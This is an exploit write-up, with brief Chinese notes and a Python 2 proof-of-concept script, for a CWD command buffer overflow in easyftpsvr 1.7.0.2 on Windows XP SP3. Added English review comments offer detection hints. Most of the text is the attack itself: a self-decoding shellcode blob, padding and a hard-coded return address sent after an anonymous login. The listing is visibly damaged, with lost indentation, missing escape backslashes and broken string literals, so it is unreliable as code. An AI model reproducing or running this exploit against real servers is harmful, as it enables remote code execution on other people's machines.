程序是FTP软件
分析登陆发包情况
然后发送 'CWD XXXXXX' 造成溢出
熟悉 FTP命令!!
程序也会对字符进行检测……
还不太清楚为什么弹框没有显示文字……
环境 : XP SP3 中文
easyftpsvr-1.7.0.2
import socket,sys
# ftp_test(ip, port): proof-of-concept client for the CWD overflow noted at the
# top of this page (easyftpsvr-1.7.0.2, XP SP3). It connects, logs in as
# anonymous, then sends one CWD command whose argument is the oversized
# `buffer` built below.
# NOTE(review): this copy is damaged. Indentation is gone, the byte strings
# read 'x50x20' rather than '\x50\x20' (the escapes appear to have lost their
# backslashes), and the send() strings are split across two lines where a line
# terminator used to be. The listing does not parse as written. It also uses
# Python 2 print statements.
def ftp_test(ip,port):
# Local aliases for the arguments; "port = port" is a no-op.
target = ip
port = port
# Opaque payload bytes as posted. The trailing "#198" appears to record the
# payload length; that cannot be confirmed from this copy because the escapes
# are damaged.
shellcode = ('x50x20'
'xD9xEE'
'xD9x74x24xF4'
'x58'
'x83xC0x1b'
'x33xC9'
'x8Ax1Cx08'
'x80xF3x11'
'x88x1Cx08'
'x41'
'x80xFBx90'
'x75xF1'
'xedx79x7bx1bx29x0fx79x72x98xc0x5ex79x23x65x80x1d'
'x9axe5x9cx6fxe5x22xcaxa6x15x3axf2x77xaax22x23x42'
'x79x64x62x74x63x45x22xc3x75x9ax4bx21x9ax5ax1dx9a'
'x58x0dx9ax18x9ax78x19xbcx2cx7bx1bx29x0fx64x14x84'
'xeex46xe9x84x71x9ax54x2dx9ax5dx14x69x12xdcx9ax48'
'x31x12xccx22xeex56x9ax25xaax12xe4x88x1exafx17x2b'
'xd5x65x19xd0xdbx16x12xc1x57xfaxe0x2ax45x35x0dx64'
'xf5x9ax48x35x12xccx77x9ax2dx6ax9ax48x0dx12xccx12'
'x3dxaax84x4exbax46x70x2cx7bx1bx29x0fx64xb8x22xca'
'x42x79x75x70x21x32x79x32x41x70x7fx9axd5x42x41x41'
'x42xeex46xedx42xeex46xe9x81')#198
# CWD argument layout: payload, 'a' filler up to 268 bytes, then a 4-byte value.
# The author's comment below pairs that value (7D5F6FA0) with a "pop ecx"
# instruction, so it is a hard-coded address.
# NOTE(review): a hard-coded address presumably only holds for the exact
# environment listed in the notes (XP SP3 Chinese) - confirm.
# Defender's view: a CWD argument of roughly 270 bytes is far outside normal
# FTP path lengths, so argument length is a usable detection signal at an
# IDS or FTP proxy.
buffer = shellcode+'a'*(268-198)+'xa0x6fx5fx7d'
#7D5F6FA0 59 pop ecx
# Plain TCP stream socket. No timeout is set, so each recv() below blocks until
# data arrives or the connection ends.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# Bare except: any error (not only a refused connection) is reported as
# "Connection failed", and the script then exits with status 0.
# connect() returns None, so the `connect` name holds nothing useful.
try:
connect = s.connect((target,port))
print "[+] Connected!"
except:
print "[!] Connection failed!"
sys.exit(0)
# Read and print the server banner.
h = s.recv(1024)
print h
# Anonymous login: USER then PASS, printing each reply. The replies are not
# inspected, so a refused login goes unnoticed. The overflow path is only
# reached after this login, which is why disabling anonymous access narrows
# exposure on an affected server.
s.send('USER anonymous
')
h = s.recv(1024)
print h
s.send('PASS anonymous
')
h = s.recv(1024)
print h
print "[+] Sending buffer"
# Send the oversized CWD command.
s.send('CWD '+ buffer + '
')
# Outcome heuristic: any normal return from recv() prints "failed"; only a
# socket exception prints "ok". A clean close by the peer makes recv() return
# an empty string, so that case is also reported as "failed".
try:
h = s.recv(1024)
print h
print "failed"
except:
print "ok"
# Script entry point: runs the test against the loopback address on the
# standard FTP control port, i.e. a server instance on the same machine.
if __name__ == "__main__":
    ftp_test("127.0.0.1", 21)